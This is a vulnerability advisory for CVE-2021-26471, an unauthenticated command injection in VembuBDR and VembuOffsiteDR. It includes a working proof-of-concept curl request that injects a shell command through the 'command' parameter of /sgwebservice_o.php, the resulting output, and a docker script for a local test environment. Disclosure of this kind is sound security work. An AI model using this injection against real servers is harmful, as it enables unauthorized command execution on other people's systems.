CVE-2021-26471

Unauthenticated remote command execution in Vembu products

CVE	CVE-2021-26471
Title	Unauthenticated remote command execution in Vembu products
Case	DIVD-2020-00011
Credits	Discovered by Wietse Boonstra () Addional research by Frank Breedijk ()
CVSS
References	https://csirt.divd.nl/cves/CVE-2021-26471/ ( x_refsource_CONFIRM ) https://csirt.divd.nl/cases/DIVD-2020-00011/ ( x_refsource_CONFIRM ) https://csirt.divd.nl/2021/05/11/Vembu-zero-days/ ( x_refsource_CONFIRM ) https://www.wbsec.nl/vembu ( x_refsource_CONFIRM )
Problem type(s)	n/a
Date published	07 Jul 2021 00:00 CEST
Last modified	04 Feb 2022 22:33 CET

Description

In VembuBDR before 4.2.0.1 and VembuOffsiteDR before 4.2.0.1, the http API located at /sgwebservice_o.php accepts a command argument. Using this command argument an unauthenticated attacker can execute arbitrary shell commands.

How to reproduce

Step 1:Start up a docker environment (see below)

Step 2: In a different terminal run the following command:

> $ curl 'http://127.0.0.1:6060/sgwebservice_o.php?Action=StoreSpecialFolder&command=echo%20hacked%20%3E%2Ftmp%2Fdivd_was_here.txt&tempFile=/tmp'
 
<storegrid><saved messsage='Files filtered and cached successfully.Now You can continue your schedule..' error='0'></saved></storegrid>$

Step 3: validate that a file was written in /tmp:

$ docker exec VembuBDR4201 /bin/bash -c "ls -l /tmp;echo ---;cat /tmp/divd_was_here.txt;echo ---"
total 16
-rw-r--r-- 1 www-data www-data    7 Feb 11 15:00 divd_was_here.txt
drwxr-xr-x 1 root     root     4096 Feb 11 14:52 hsperfdata_root
drwxr-xr-x 1 root     root     4096 Feb 11 14:52 vmware
drwx------ 2 root     root     4096 Jun 12  2020 vmware-root
---
hacked
---
$

Impact

This vulnerability allows an attacker to execute an arbitrary (windows/linux) shell command in the context of the httpd process.

About the docker test environment.

In order to set up the docker test environment, we used the following script:

#!/bin/bash
 
# Network
if [[ $(docker network ls |grep vembu-netowrk |wc -l ) -lt 1 ]]; then
  docker network create --subnet=172.18.0.0/16 vembu-network
fi
 
# Start Database container
mkdir DB
while [[ $(docker ps -a |grep VembuDatabase|wc -l) -ge 1 ]]; do
  docker kill VembuDatabase
  docker rm VembuDatabase
  sleep 1
done
docker run --name VembuDatabase --network vembu-network --ip 172.18.0.2 -p 5432:5432 -d -e POSTGRES_PASSWORD=admin -e POSTGRES_USER=postgres -e POSTGRES_DB=SGDatabase -v  $PWD/DB:/vembu vembubdr/bdr-latest:psql-latest
 
# Wait for database port to open
echo -c "Waiting for database to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/5432" ; do 
  echo -c "."
  sleep 1; 
done
echo
 
# Start APP container
mkdir APP
while [[ $(docker ps -a |grep VembuBDR4201|wc -l) -ge 1 ]]; do
  docker kill VembuBDR4201
  docker rm VembuBDR4201
  sleep 1
done
 
docker run --name VembuBDR4201 --network vembu-network --ip 172.18.0.3 --add-host VembuDatabase:172.18.0.2 --privileged=true -i -t -d --device /dev/fuse --privileged -p 6060:6060 -p 32004:32004 -v $PWD/APP:/vembu vembubdr/bdr-latest:vembubdr-4201-u1
 
# Wait for app port to open
echo -c "Waiting for application to become available..."
while ! timeout 1 bash -c "echo > /dev/tcp/localhost/6060" ; do 
  echo -c "."
  sleep 1; 
done
echo 

JSON version.